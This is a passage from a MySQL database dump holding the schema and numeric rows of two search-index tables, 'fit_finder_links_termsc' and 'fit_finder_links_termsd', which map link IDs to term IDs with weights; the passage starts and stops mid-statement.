KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_termsc` -- LOCK TABLES `fit_finder_links_termsc` WRITE; /*!40000 ALTER TABLE `fit_finder_links_termsc` DISABLE KEYS */; INSERT INTO `fit_finder_links_termsc` VALUES (104,23,0.07),(105,23,0.07),(117,23,0.07),(119,23,0.07),(128,23,0.07),(2,23,0.17),(110,23,0.28),(118,23,0.37),(111,39,0.14),(3,39,0.34),(5,374,0.51),(119,433,0.14),(9,433,0.34),(116,3023,0.21),(20,3023,0.51),(22,3042,0.51),(23,3047,0.51),(35,9204,0.28),(35,9205,1.14331),(35,9206,1.26),(35,9207,0.18669),(35,9208,0.93331),(35,9209,1.09669),(35,9210,0.28),(35,9211,0.95669),(35,9212,1.02669),(35,9213,0.28),(35,9214,0.93331),(35,9215,1.21331),(35,9216,0.14),(111,9216,0.14),(119,9216,0.14),(120,9216,0.14),(126,9216,0.42),(35,9217,0.93331),(35,9218,1.09669),(35,9222,0.34),(40,10786,0.51),(103,11411,0.07),(104,11411,0.07),(117,11411,0.07),(128,11411,0.07),(110,11411,0.14),(109,11411,0.2),(111,11411,0.2),(68,11411,0.37),(111,12036,0.21),(121,12036,0.51),(52,12140,0.51),(55,12383,0.51),(58,12570,0.51),(68,13705,0.51),(111,13733,0.21),(112,13733,0.51),(77,13742,0.51),(104,15844,0.07),(117,15844,0.07),(128,15844,0.07),(105,15844,0.2),(103,15866,0.32669),(103,15867,0.95669),(103,15868,1.09669),(104,15869,0.14),(111,15869,0.14),(119,15869,0.14),(126,15869,0.14),(106,15869,0.28),(103,15869,0.4),(128,15869,0.42),(103,15870,0.51),(103,15871,1.00331),(103,15872,1.05),(103,15873,0.42),(103,15874,1.09669),(103,15875,1.30669),(103,15876,0.14),(104,15876,0.14),(103,15877,0.88669),(103,15878,0.95669),(104,18222,0.84),(104,18223,0.88669),(104,18224,0.86331),(104,18225,1.02669),(104,18226,0.14),(110,18226,0.14),(123,18226,0.14),(126,18226,0.14),(128,18226,0.14),(109,18226,0.28),(120,18226,0.28),(104,18227,0.86331),(104,18228,1.02669),(104,18229,0.14),(111,18229,0.14),(104,18230,0.93331),(104,18231,1.05),(104,18232,0.51),(104,18233,0.84),(104,18234,0.95669),(104,18235,0.28),(104,18236,0.88669),(104,18237,0.95669),(104,18238,0.18669),(104,18239,0.84),(104,18240,0.95669),(104,18241,0.18669),(104,18242,0.88669),(104,18243,1.00331),(104,18244,0.14),(119,18244,0.14),(104,18245,0.79331),(104,18246,0.91),(104,18247,0.86331),(104,18248,0.95669),(104,18249,0.18669),(104,18250,0.91),(104,18251,1.05),(104,18252,0.14),(104,18253,0.79331),(104,18254,0.91),(104,18267,0.84),(104,18268,0.93331),(105,19325,0.21),(126,19325,0.21),(105,19326,0.95669),(105,19327,1.05),(105,19328,0.81669),(105,19329,0.95669),(105,19330,0.14),(119,19330,0.14),(123,19330,0.14),(126,19330,0.14),(105,19331,0.86331),(105,19332,0.95669),(105,19333,0.51),(105,19334,0.28),(105,19335,0.93331),(105,19336,1.00331),(105,19337,0.14),(110,19337,0.14),(119,19337,0.14),(105,19338,1.00331),(105,19339,1.12),(105,19340,0.14),(105,19341,0.86331),(105,19342,1.00331),(105,19343,0.28),(105,19344,0.95669),(105,19345,1.02669),(105,19346,0.28),(105,19347,0.88669),(105,19348,1.02669),(123,19349,0.14),(126,19349,0.14),(105,19349,0.28),(128,19349,0.34),(105,19350,0.91),(105,19351,0.98),(105,19352,0.91),(105,19353,1.07331),(105,19354,0.28),(105,19355,0.91),(105,19356,0.98),(106,20756,0.37331),(106,20757,0.95669),(106,20758,1.19),(106,20759,1.86662),(106,20760,1.12),(106,20761,1.14331),(106,20762,0.51),(106,20763,0.32669),(106,20764,0.93331),(106,20765,1.00331),(106,20766,0.32669),(106,20767,0.93331),(106,20768,0.98),(107,22158,0.32669),(107,22159,1.02669),(107,22160,1.21331),(107,22161,0.28),(107,22162,1.02669),(107,22163,1.19),(107,22164,0.51),(107,22165,0.37338),(107,22166,1.82),(107,22167,1.09669),(107,22168,1.16669),(107,22169,0.18662),(107,22170,1.63338),(107,22171,1.77338),(109,24350,0.86331),(109,24351,0.93331),(109,24352,0.91),(109,24353,1.02669),(109,24354,0.51),(109,24355,0.14),(110,24355,0.28),(109,24356,0.91),(109,24357,1.00331),(109,24358,0.14),(109,24359,0.93331),(109,24360,1.05),(109,24361,0.28),(109,24362,1.02669),(109,24363,1.12),(109,24364,0.28),(126,24364,0.28),(123,24364,0.56),(112,24364,0.84),(125,24364,0.84),(116,24364,1.12),(109,24365,1.02669),(109,24366,1.23669),(110,25074,0.86331),(110,25075,0.95669),(110,25076,0.86331),(110,25077,0.93331),(110,25078,0.98),(110,25079,1.19),(110,25080,0.84),(110,25081,0.91),(110,25082,0.28),(110,25083,0.88669),(110,25084,1.12),(110,25085,0.35),(110,25086,0.93331),(110,25087,0.42),(110,25088,1.02669),(110,25089,1.19),(110,25090,0.28),(110,25091,0.91),(110,25092,1.00331),(110,25093,0.37338),(110,25094,0.95669),(110,25095,1.05),(110,25096,1.00331),(110,25097,1.12),(110,25098,0.98),(110,25099,1.05),(110,25100,0.51),(110,25101,1.72662),(110,25102,1.00331),(110,25103,0.95669),(110,25104,0.84),(110,25105,0.93331),(110,25106,0.18669),(110,25107,1.00331),(110,25108,1.16669),(110,25109,0.93331),(110,25110,1.02669),(110,25111,0.81669),(110,25112,1.02669),(120,25113,0.56),(110,25113,0.84),(110,25114,0.88669),(110,25115,0.98),(110,25116,1.86662),(110,25117,2.00662),(110,25118,0.37331),(110,25119,0.98),(110,25120,1.02669),(110,25121,0.42),(110,25122,0.98),(110,25123,1.16669),(110,25124,0.37331),(110,25125,1.05),(110,25126,1.16669),(110,25127,0.14),(110,25128,0.88669),(110,25129,0.98),(111,29585,0.81669),(111,29586,0.95669),(111,29587,0.95669),(111,29588,1.02669),(111,29589,0.51),(111,29590,0.88669),(111,29591,1.16669),(111,29592,0.95669),(111,29593,1.05),(111,29594,0.35),(111,29595,1.00331),(111,29596,1.07331),(111,29597,0.88669),(111,29598,1.05),(111,29599,0.56),(111,29600,0.84),(111,29601,0.91),(111,29602,0.93331),(111,29603,1.16669),(111,29625,0.88669),(111,29626,1.09669),(112,32164,2.73),(112,32165,1.14331),(112,32166,2.14662),(112,32167,0.46669),(112,32168,1.19),(112,32169,1.28331),(113,33484,0.51),(114,35215,0.51),(116,37013,1.05),(116,37014,1.26),(116,37015,0.51),(116,37016,1.05),(116,37017,1.19),(116,37018,1.02669),(116,37019,1.19),(116,37020,0.86331),(116,37021,1.02669),(116,37022,0.95669),(116,37023,1.05),(117,37665,0.81669),(117,37666,0.93331),(117,37667,0.51),(117,37668,0.86331),(117,37669,0.95669),(117,37670,0.28),(117,37671,0.93331),(117,37672,1.00331),(117,37673,0.95669),(117,37674,1.19),(119,39801,0.81669),(119,39802,0.95669),(119,39803,0.88669),(119,39804,1.00331),(119,39805,0.21),(119,39806,0.91),(119,39807,1.02669),(119,39808,0.88669),(119,39809,1.07331),(119,39810,0.88669),(119,39811,1.12),(119,39812,0.88669),(119,39813,0.93331),(119,39814,0.28),(119,39815,0.91),(119,39816,1.00331),(119,39817,0.98),(119,39818,1.16669),(119,39819,0.86331),(119,39820,0.93331),(119,39821,0.86331),(119,39822,0.93331),(120,41081,0.86331),(120,41082,1.05),(120,41083,0.88669),(120,41084,1.02669),(120,41085,0.23331),(120,41086,0.95669),(120,41087,1.12),(120,41088,0.28),(120,41089,0.88669),(120,41090,0.98),(120,41091,0.28),(120,41092,0.88669),(120,41093,1.16669),(120,41094,0.23331),(120,41095,0.98),(120,41096,1.07331),(120,41097,0.28),(120,41098,0.88669),(120,41099,1.07331),(120,41100,0.28),(120,41101,0.93331),(120,41102,0.98),(120,41103,0.93331),(120,41104,1.00331),(120,41105,0.28),(120,41106,1.02669),(120,41107,1.14331),(120,41108,0.93331),(120,41109,1.02669),(120,41110,0.91),(120,41111,0.98),(123,44445,1.14331),(123,44446,1.28331),(123,44447,0.51),(123,44448,0.86331),(123,44449,1.05),(123,44450,0.35),(123,44451,1.00331),(123,44452,1.16669),(123,44453,0.28),(123,44454,0.91),(123,44455,1.07331),(123,44456,0.28),(126,44456,0.28),(134,44456,0.28),(123,44457,0.98),(123,44458,1.23669),(123,44459,0.93331),(123,44460,1.05),(123,44461,0.93331),(123,44462,1.07331),(123,44463,0.86331),(126,44463,0.86331),(123,44464,1.00331),(123,44465,0.28),(123,44466,0.98),(123,44467,1.16669),(123,44468,0.14),(126,44468,0.14),(123,44469,0.88669),(123,44470,0.98),(123,44471,0.14),(123,44472,0.86331),(123,44473,1.00331),(125,47358,0.51),(125,47359,1.77338),(125,47360,1.07331),(125,47361,1.00331),(125,47362,1.05),(125,47363,1.16669),(126,48276,0.86331),(126,48277,0.95669),(126,48278,0.42),(126,48279,0.95669),(126,48280,1.02669),(126,48281,0.28),(126,48282,0.88669),(126,48283,1.07331),(126,48284,0.84),(126,48285,0.93331),(126,48286,0.88669),(126,48287,0.95669),(126,48288,0.51),(126,48289,0.88669),(126,48290,0.95669),(126,48291,0.28),(126,48292,0.88669),(126,48293,1.05),(126,48294,0.93331),(126,48295,1.02669),(126,48296,0.91),(126,48297,1.02669),(126,48298,0.81669),(126,48299,1.00331),(126,48300,0.86331),(126,48301,1.00331),(126,48302,0.88669),(126,48303,1.07331),(126,48304,0.28),(134,48304,0.28),(126,48305,0.88669),(126,48306,1.12),(126,48307,0.86331),(126,48308,0.95669),(126,48309,0.93331),(126,48310,0.23331),(126,48311,1.00331),(126,48312,1.14331),(126,48313,0.95669),(126,48314,1.05),(126,48330,0.14),(126,48331,0.81669),(126,48332,0.91),(128,51075,0.14),(128,51076,0.84),(128,51077,0.93331),(128,51078,0.42),(128,51079,0.81669),(128,51080,0.91),(128,51081,1.68),(128,51082,1.86662),(128,51083,0.28),(128,51084,0.81669),(128,51085,0.91),(128,51086,0.81669),(128,51087,0.91),(128,51088,0.93331),(128,51089,1.07331),(128,51090,0.88669),(128,51091,1.00331),(128,51092,0.86331),(128,51093,0.98),(128,51094,0.79331),(128,51095,0.93331),(128,51096,0.81669),(128,51097,0.93331),(128,51098,0.63),(128,51099,0.91),(128,51100,1.02669),(128,51101,0.86331),(128,51102,0.93331),(128,51103,0.93331),(128,51104,1.02669),(128,51135,0.86331),(128,51136,0.98),(129,51919,0.51),(130,51920,0.51),(133,52359,0.51),(134,52578,0.51),(134,52579,0.86331),(134,52580,0.98),(134,52581,1.02669),(134,52582,1.14331); /*!40000 ALTER TABLE `fit_finder_links_termsc` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_termsd` -- DROP TABLE IF EXISTS `fit_finder_links_termsd`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_termsd` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_termsd` -- LOCK TABLES `fit_finder_links_termsd` WRITE; /*!40000 ALTER TABLE `fit_finder_links_termsd` DISABLE KEYS */; INSERT INTO `fit_finder_links_termsd` VALUES (3,213,0.28),(3,214,0.95669),(3,215,1.05),(52,523,0.01169),(55,523,0.01169),(114,523,0.01169),(9,523,0.02338),(121,523,0.02338),(40,523,0.03507),(68,523,0.03507),(134,523,0.03507),(25,523,0.04008),(133,523,0.04676),(123,523,0.05845),(111,523,0.07014),(35,523,0.08183),(104,523,0.08183),(119,523,0.09352),(128,523,0.09352),(105,523,0.1169),(117,523,0.1169),(126,523,0.1169),(107,523,0.12859),(118,523,0.12859),(125,523,0.12859),(112,523,0.14028),(106,523,0.15197),(116,523,0.17535),(103,523,0.21042),(113,523,0.21042),(120,523,0.29225),(110,523,0.98196),(9,524,0.98),(9,525,1.05),(9,526,0.95669),(9,527,1.12),(9,528,0.18669),(103,528,0.18669),(123,528,0.18669),(9,529,0.95669),(9,530,1.09669),(9,531,0.01169),(35,531,0.01169),(55,531,0.01169),(105,531,0.01169),(112,531,0.01169),(125,531,0.01169),(126,531,0.01169),(106,531,0.02338),(116,531,0.03507),(107,531,0.04676),(117,531,0.04676),(103,531,0.05845),(113,531,0.08183),(110,531,1.32097),(9,532,0.79331),(9,533,0.91),(35,1671,0.84),(68,1671,0.84),(107,1671,0.84),(112,1671,0.84),(116,1671,0.84),(118,1671,0.84),(119,1671,0.84),(123,1671,0.84),(133,1671,0.84),(134,1671,0.84),(103,1671,1.68),(104,1671,1.68),(106,1671,1.68),(125,1671,1.68),(126,1671,3.36),(105,1671,4.2),(113,1671,4.2),(120,1671,5.88),(110,1671,20.16),(35,1673,0.23331),(110,1673,0.23331),(112,1673,0.23331),(35,1676,0.01169),(55,1676,0.01169),(114,1676,0.01169),(128,1676,0.01169),(133,1676,0.01169),(68,1676,0.02338),(118,1676,0.02338),(123,1676,0.02338),(126,1676,0.02338),(134,1676,0.02338),(121,1676,0.0334),(113,1676,0.03507),(116,1676,0.03507),(125,1676,0.03507),(112,1676,0.05845),(119,1676,0.05845),(120,1676,0.05845),(107,1676,0.07014),(117,1676,0.07014),(104,1676,0.09352),(105,1676,0.10521),(103,1676,0.12859),(110,1676,0.18704),(117,1682,0.0175),(125,1682,0.0175),(112,1682,0.035),(123,1682,0.035),(116,1682,0.0525),(35,1682,0.07),(35,1683,1.91338),(35,2898,0.18669),(21,2898,0.32004),(22,2898,0.32004),(20,2898,0.50673),(20,3028,0.34),(20,3029,1.2),(20,3030,2.9334),(20,3031,0.91),(20,3032,1.02669),(25,3072,2.88),(25,3073,3.36),(35,9636,0.84),(110,9636,5.04),(35,9637,1.09669),(35,9638,0.84),(35,9639,1.09669),(35,9640,1.07331),(35,9641,1.14331),(35,9642,0.84),(120,9642,0.84),(35,9643,1.05),(35,9644,0.84),(112,9644,0.84),(35,9645,1.02669),(35,9646,1.00331),(35,9647,1.19),(35,9648,1.02669),(35,9649,0.0175),(106,9649,0.0175),(107,9649,0.0175),(110,9649,0.0175),(113,9649,0.0175),(117,9649,0.0175),(123,9649,0.0175),(126,9649,0.0175),(103,9649,0.035),(105,9649,0.035),(116,9649,0.035),(119,9649,0.035),(109,9649,0.0525),(35,9650,0.84),(35,9651,1.07331),(35,9652,0.91),(35,9653,1.07331),(35,9654,0.32669),(35,9655,0.93331),(35,9656,1.05),(35,9657,0.88669),(35,9658,0.98),(35,9659,0.84),(68,9659,0.84),(105,9659,0.84),(112,9659,0.84),(113,9659,0.84),(119,9659,0.84),(125,9659,0.84),(133,9659,0.84),(134,9659,0.84),(116,9659,1.68),(103,9659,3.36),(110,9659,4.2),(107,9659,5.04),(35,9660,1.07331),(35,9661,0.51331),(35,9662,1.21331),(35,9663,1.28331),(35,9664,0.95669),(35,9665,1.16669),(40,9666,0.23331),(58,9666,0.23331),(116,9666,0.23331),(119,9666,0.23331),(110,9666,0.46662),(35,9666,0.69993),(52,9666,0.69993),(35,9667,2.14662),(35,9668,1.21331),(35,9669,1.28331),(35,9670,0.88669),(110,9670,1.77338),(35,9671,1.02669),(35,9672,0.02919),(40,9672,0.02919),(68,9672,0.02919),(112,9672,0.02919),(113,9672,0.02919),(116,9672,0.02919),(117,9672,0.02919),(120,9672,0.02919),(125,9672,0.02919),(128,9672,0.02919),(105,9672,0.05838),(119,9672,0.05838),(103,9672,0.08757),(110,9672,0.32109),(35,9673,1.02669),(35,9674,1.23669),(35,9675,0.28),(35,9676,0.91),(35,9677,1.02669),(35,9678,1.12),(35,9679,1.07331),(35,9680,0.95669),(35,9681,1.05),(35,9682,0.93331),(35,9683,1.00331),(105,10654,0.79331),(118,10654,0.79331),(110,10654,1.58662),(112,10654,1.58662),(103,10654,2.37993),(103,10656,0.02331),(110,10656,0.02331),(112,10656,0.02331),(117,10656,0.02331),(118,10656,0.02331),(119,10656,0.02331),(120,10656,0.02331),(123,10656,0.04662),(125,10656,0.04662),(40,10873,0.98),(134,10873,0.98),(40,10874,1.19),(40,10875,0.93331),(40,10876,1.16669),(40,10877,1.00331),(40,10878,1.14331),(40,10879,1.09669),(40,10880,1.19),(40,10881,1.12),(40,10882,1.33),(52,11790,0.28),(55,11790,0.28),(106,11790,0.28),(113,11790,1.68),(52,12214,0.93331),(52,12215,1.09669),(52,12216,0.28),(55,12216,0.28),(113,12216,0.28),(120,12216,0.28),(52,12217,1.00331),(55,12217,1.00331),(52,12218,1.05),(52,12219,1.12),(55,12219,1.12),(52,12220,1.23669),(55,12220,1.23669),(52,12221,0.95669),(52,12222,1.12),(52,12223,1.05),(52,12224,1.16669),(52,12225,1.00331),(58,12225,1.00331),(52,12226,1.05),(55,12447,0.93331),(55,12448,1.07331),(55,12449,1.05),(55,12450,0.98),(55,12451,1.14331),(55,12452,1.00331),(55,12453,1.05),(55,12454,0.18669),(55,12455,0.98),(55,12456,1.14331),(58,12639,1.05),(110,12840,0.42),(68,13577,0.93331),(68,13578,1.02669),(68,13579,1.14331),(68,13580,0.88669),(68,13581,1.02669),(134,13582,0.37331),(68,13582,1.97321),(113,13582,1.97321),(68,13583,5.79679),(113,13583,5.79679),(68,13584,6.29),(113,13584,6.29),(68,13585,0.86331),(68,13586,0.98),(68,13587,1.14331),(68,13588,1.07331),(68,13589,1.14331),(104,13590,0.28),(105,13590,0.28),(106,13590,0.28),(109,13590,0.28),(120,13590,0.28),(68,13590,0.56),(114,13590,0.56),(117,13590,0.56),(128,13590,0.84),(113,13590,1.4),(68,13591,0.91),(68,13592,1.07331),(68,13593,0.95669),(68,13594,1.02669),(120,14170,0.46669),(110,14173,0.81669),(110,14183,1.05),(110,15703,0.04669),(114,15703,0.04669),(111,15703,0.23345),(103,17210,0.32669),(103,17211,1.14331),(103,17212,1.23669),(103,17213,0.79331),(110,17213,1.58662),(117,17213,1.58662),(120,17213,1.58662),(125,17213,2.37993),(103,17214,0.98),(103,17215,0.93331),(103,17216,1.07331),(103,17217,0.84),(103,17218,0.91),(103,17219,0.95669),(103,17220,1.05),(103,17221,0.95669),(103,17222,1.14331),(103,17223,0.88669),(103,17224,1.02669),(103,17225,0.79331),(103,17226,0.93331),(103,17227,0.91),(103,17228,1.00331),(103,17229,0.88669),(103,17230,1.07331),(103,17231,0.86331),(103,17232,1.09669),(103,17233,0.81669),(103,17234,0.98),(103,17235,0.91),(103,17236,1.05),(103,17237,0.86331),(125,17237,0.86331),(103,17238,0.98),(103,17239,1.00331),(103,17240,0.95669),(103,17241,0.86331),(106,17241,0.86331),(107,17241,0.86331),(118,17241,0.86331),(120,17241,0.86331),(103,17242,1.07331),(103,17243,0.86331),(103,17244,1.12),(103,17245,0.91),(103,17246,0.98),(105,17247,0.86331),(103,17247,1.72662),(103,17248,0.95669),(103,17249,0.91),(103,17250,0.0175),(104,17250,0.0175),(110,17250,0.0175),(113,17250,0.0175),(119,17250,0.0175),(120,17250,0.0175),(126,17250,0.0175),(103,17251,0.91),(103,17252,1.16669),(103,17253,0.95669),(103,17254,0.98),(103,17255,0.93331),(103,17256,0.81669),(119,17256,0.81669),(103,17257,0.98),(103,17258,0.84),(105,17258,0.84),(110,17258,0.84),(103,17259,1.00331),(103,17260,0.91),(103,17261,1.02669),(103,17262,0.86331),(103,17263,1.00331),(103,17264,1.00331),(103,17265,0.95669),(103,17266,0.95669),(103,17267,1.00331),(117,17268,0.14),(119,17268,0.14),(103,17268,0.28),(107,17268,0.28),(113,17268,0.28),(104,17268,0.42),(105,17268,0.42),(116,17268,0.42),(126,17268,0.42),(110,17268,0.7),(103,17269,0.91),(103,17270,0.95669),(103,17271,0.86331),(103,17272,0.95669),(103,17273,0.91),(103,17274,1.00331),(103,17275,0.86331),(103,17276,0.91),(103,17277,0.98),(103,17278,1.14331),(103,17279,0.84),(103,17280,1.12),(103,17281,0.91),(103,17282,1.14331),(105,17283,0.84),(103,17283,1.68),(110,17283,4.2),(103,17284,1.02669),(103,17285,0.98),(103,17286,0.09331),(103,17287,0.93331),(103,17288,1.05),(103,17289,0.91),(103,17290,1.05),(103,17291,0.95669),(103,17292,1.09669),(103,17293,0.91),(103,17294,1.05),(112,17295,0.0175),(113,17295,0.0175),(126,17295,0.0175),(105,17295,0.035),(106,17295,0.035),(107,17295,0.035),(119,17295,0.035),(103,17295,0.0525),(110,17295,0.0525),(117,17295,0.0525),(120,17295,0.07),(103,17296,0.81669),(119,17296,0.81669),(103,17297,0.91),(103,17298,0.95669),(103,17299,1.16669),(103,17300,0.86331),(103,17301,0.91),(103,17302,0.32669),(103,17303,0.95669),(103,17304,1.12),(103,17305,0.32669),(103,17306,1.07331),(103,17307,1.16669),(103,17308,0.51331),(103,17309,1.07331),(103,17310,1.26),(113,17311,0.02331),(117,17311,0.02331),(120,17311,0.02331),(125,17311,0.02331),(105,17311,0.04662),(107,17311,0.04662),(110,17311,0.04662),(126,17311,0.04662),(128,17311,0.04662),(103,17311,0.06993),(126,17312,0.88669),(103,17312,1.77338),(105,17312,1.77338),(110,17312,1.77338),(103,17313,1.12),(103,17314,1.05),(103,17315,0.98),(103,17316,1.07331),(110,17317,0.14),(113,17317,0.14),(126,17317,0.14),(103,17317,0.28),(103,17318,0.95669),(103,17319,1.16669),(103,17320,0.91),(103,17321,1.02669),(104,18827,0.81669),(104,18828,1.02669),(104,18829,0.84),(120,18829,0.84),(104,18830,0.98),(104,18831,0.88669),(104,18832,1.07331),(104,18833,0.86331),(104,18834,1.00331),(104,18835,0.95669),(104,18836,1.05),(104,18837,0.86331),(120,18837,0.86331),(104,18838,0.95669),(104,18839,0.32669),(104,18840,0.93331),(104,18841,1.05),(104,18842,0.02919),(117,18842,0.02919),(104,18843,1.02669),(104,18844,1.09669),(104,18845,0.98),(104,18846,1.09669),(104,18847,1.00331),(104,18848,1.16669),(104,18849,0.95669),(104,18850,1.00331),(104,18851,0.91),(104,18852,1.00331),(104,18853,0.91),(104,18854,0.98),(104,18855,0.86331),(123,18855,0.86331),(104,18856,1.05),(104,18857,0.88669),(104,18858,0.98),(104,18859,0.93331),(104,18860,1.00331),(104,18861,0.98),(104,18862,1.09669),(104,18863,0.02331),(105,18863,0.02331),(119,18863,0.02331),(125,18863,0.02331),(110,18863,0.04662),(104,18864,0.86331),(104,18865,1.00331),(104,18866,0.91),(104,18867,1.00331),(104,18868,0.84),(105,18868,0.84),(113,18868,0.84),(126,18868,0.84),(116,18868,1.68),(104,18869,0.93331),(104,18870,0.98),(104,18871,1.09669),(104,18872,0.32669),(128,18872,0.32669),(104,18873,0.98),(104,18874,1.09669),(104,18875,0.56),(104,18876,0.91),(104,18877,1.16669),(104,18878,0.93331),(104,18879,1.09669),(104,18880,0.95669),(104,18881,1.09669),(105,20187,0.84),(105,20188,1.09669),(105,20189,0.91),(105,20190,1.07331),(105,20191,0.88669),(105,20192,0.93331),(105,20193,0.93331),(105,20194,1.02669),(105,20195,0.98),(105,20196,0.98),(105,20197,1.00331),(105,20198,1.02669),(105,20199,0.95669),(105,20200,0.86331),(105,20201,1.00331),(105,20202,0.86331),(105,20203,0.95669),(105,20204,1.02669),(105,20205,0.65338),(105,20206,1.00331),(105,20207,1.09669),(105,20208,1.02669),(105,20209,1.12),(105,20210,0.93331),(105,20211,0.93331),(105,20212,1.05),(105,20213,0.95669),(105,20214,0.81669),(105,20215,0.91),(105,20216,0.81669),(105,20217,0.91),(105,20218,0.91),(105,20219,1.05),(105,20220,0.86331),(105,20221,1.02669),(105,20222,0.88669),(105,20223,1.02669),(105,20224,0.95669),(105,20225,0.86331),(105,20226,0.91),(105,20227,0.88669),(105,20228,1.00331),(105,20229,0.91),(105,20230,1.02669),(105,20231,0.93331),(113,20231,0.93331),(105,20232,0.32669),(116,20232,0.32669),(105,20233,1.02669),(105,20234,1.23669),(105,20235,1.02669),(105,20236,0.98),(105,20237,1.09669),(105,20238,0.95669),(105,20239,1.09669),(105,20240,0.86331),(105,20241,0.98),(105,20242,0.84),(117,20242,0.84),(126,20242,0.84),(110,20242,1.68),(105,20243,0.93331),(110,20243,0.93331),(126,20243,0.93331),(105,20244,1.00331),(105,20245,1.14331),(105,20246,0.32669),(105,20247,0.95669),(105,20248,1.09669),(105,20249,0.28),(105,20250,0.91),(105,20251,1.00331),(105,20252,1.16669),(105,20253,1.02669),(106,21583,0.32669),(106,21584,0.95669),(106,21585,1.26),(106,21586,0.37331),(123,21586,0.37331),(106,21587,1.12),(106,21588,1.28331),(106,21589,0.81669),(126,21589,0.81669),(106,21590,1.00331),(106,21591,1.77338),(106,21592,1.05),(106,21593,1.05),(106,21594,0.93331),(106,21595,1.05),(106,21596,0.88669),(106,21597,1.21331),(106,21598,0.88669),(106,21599,1.12),(106,21600,0.88669),(128,21600,0.88669),(106,21601,1.05),(128,21601,1.05),(106,21602,0.84),(106,21603,1.02669),(106,21604,1.00331),(106,21605,1.12),(106,21606,0.95669),(106,21607,1.00331),(106,21608,1.05),(106,21609,0.88669),(106,21610,1.12),(106,21611,0.81669),(106,21612,0.93331),(106,21613,0.32669),(120,21613,0.32669),(106,21614,1.02669),(106,21615,1.19),(106,21616,0.14),(106,21617,0.88669),(106,21618,1.07331),(106,21619,1.02669),(106,21620,1.12),(106,21621,0.91),(106,21622,0.98),(106,21623,0.93331),(106,21624,1.09669),(106,21625,0.84),(106,21626,1.00331),(106,21627,1.19),(106,21628,1.00331),(106,21629,1.12),(106,21630,1.00331),(106,21631,1.26),(106,21632,0.32669),(106,21633,0.98),(106,21634,1.14331),(106,21635,0.56),(106,21636,1.00331),(106,21637,1.19),(106,21638,1.05),(106,21639,1.23669),(106,21640,0.37331),(106,21641,1.02669),(106,21642,1.14331),(106,21643,0.28),(106,21644,0.93331),(106,21645,1.14331),(106,21646,0.23331),(106,21647,0.98),(106,21648,1.07331),(106,21649,0.95669),(106,21650,1.09669),(106,21651,0.88669),(106,21652,1.02669),(106,21653,0.91),(120,21653,0.91),(106,21654,1.07331),(107,22709,3.36),(107,22710,3.82676),(107,22711,0.86331),(107,22712,1.02669),(107,22713,1.86662),(107,22714,1.05),(107,22715,1.12),(107,22716,0.93331),(107,22717,1.00331),(107,22718,1.72662),(107,22719,2.1),(107,22720,0.93331),(107,22721,1.00331),(112,22722,0.09331),(107,22722,0.18662),(107,22723,1.72662),(107,22724,1.91338),(107,22725,2.05338),(107,22726,1.91338),(107,22727,1.91338),(107,22728,1.68),(107,22729,1.09669),(107,22730,1.07331),(117,22731,0.93331),(107,22731,1.86662),(110,22731,1.86662),(107,22732,2.1),(107,22733,1.86662),(107,22734,1.05),(107,22735,1.02669),(107,22736,0.98),(107,22737,1.05),(107,22738,0.95669),(107,22739,1.16669),(107,22740,1.68),(107,22741,2.00662),(107,22742,0.32669),(112,22742,0.32669),(126,22742,0.32669),(116,22742,0.65338),(107,22743,0.98),(107,22744,1.07331),(113,23789,0.86331),(117,23800,0.09331),(113,23803,0.18669),(119,23818,0.32669),(119,23821,0.18669),(109,24835,0.91),(109,24836,1.07331),(109,24837,1.96),(109,24838,1.09669),(109,24839,1.14331),(109,24840,0.18669),(111,24840,0.93345),(109,24841,0.88669),(109,24842,1.07331),(109,24843,0.32669),(109,24844,0.98),(109,24845,1.30669),(109,24846,0.14),(111,24846,0.14),(109,24847,0.88669),(109,24848,1.05),(109,24849,0.32669),(109,24850,0.98),(109,24851,1.21331),(117,24852,0.32669),(109,24852,0.65338),(109,24853,1.12),(109,24854,1.19),(109,24855,1.07331),(109,24856,1.16669),(109,24857,0.88669),(109,24858,1.09669),(110,27482,0.86331),(110,27483,0.98),(110,27484,0.46669),(110,27485,1.00331),(110,27486,1.4),(110,27487,0.51331),(110,27488,1.02669),(110,27489,1.21331),(110,27490,0.42),(110,27491,0.98),(110,27492,1.16669),(110,27493,0.23331),(110,27494,1.00331),(110,27495,1.07331),(110,27496,0.37338),(110,27497,1.72662),(110,27498,1.02669),(110,27499,1.05),(110,27500,1.07331),(110,27501,0.91),(110,27502,0.91),(110,27503,1.05),(110,27504,1.14331),(110,27505,1.91338),(110,27506,0.95669),(110,27507,0.98),(110,27508,1.02669),(110,27509,0.95669),(110,27510,1.07331),(110,27511,0.95669),(110,27512,1.14331),(110,27513,0.93331),(110,27514,1.00331),(110,27515,0.88669),(110,27516,1.09669),(110,27517,0.88669),(110,27518,0.95669),(110,27519,0.91),(110,27520,1.07331),(110,27521,0.88669),(110,27522,0.98),(110,27523,0.84),(110,27524,1.12),(110,27525,2.05338),(110,27526,1.09669),(110,27527,1.19),(110,27528,1.68),(110,27529,0.91),(110,27530,0.98),(110,27531,0.91),(110,27532,0.98),(110,27533,0.98),(110,27534,1.14331),(110,27535,0.95669),(110,27536,1.02669),(110,27537,0.93331),(110,27538,1.00331),(110,27539,1.77338),(110,27540,1.96),(110,27541,1.91338),(110,27542,1.02669),(110,27543,1.14331),(110,27544,1.07331),(110,27545,1.19),(110,27546,0.84),(110,27547,0.88669),(110,27548,0.81669),(110,27549,1.05),(110,27550,1.05),(110,27551,1.12),(110,27552,0.95669),(110,27553,1.26),(110,27554,0.93331),(110,27555,1.02669),(110,27556,0.88669),(110,27557,1.12),(110,27558,1.82),(110,27559,1.00331),(110,27560,1.14331),(110,27561,1.09669),(110,27562,1.28331),(110,27563,0.91),(110,27564,1.00331),(110,27565,0.93331),(110,27566,1.00331),(110,27567,0.98),(110,27568,1.16669)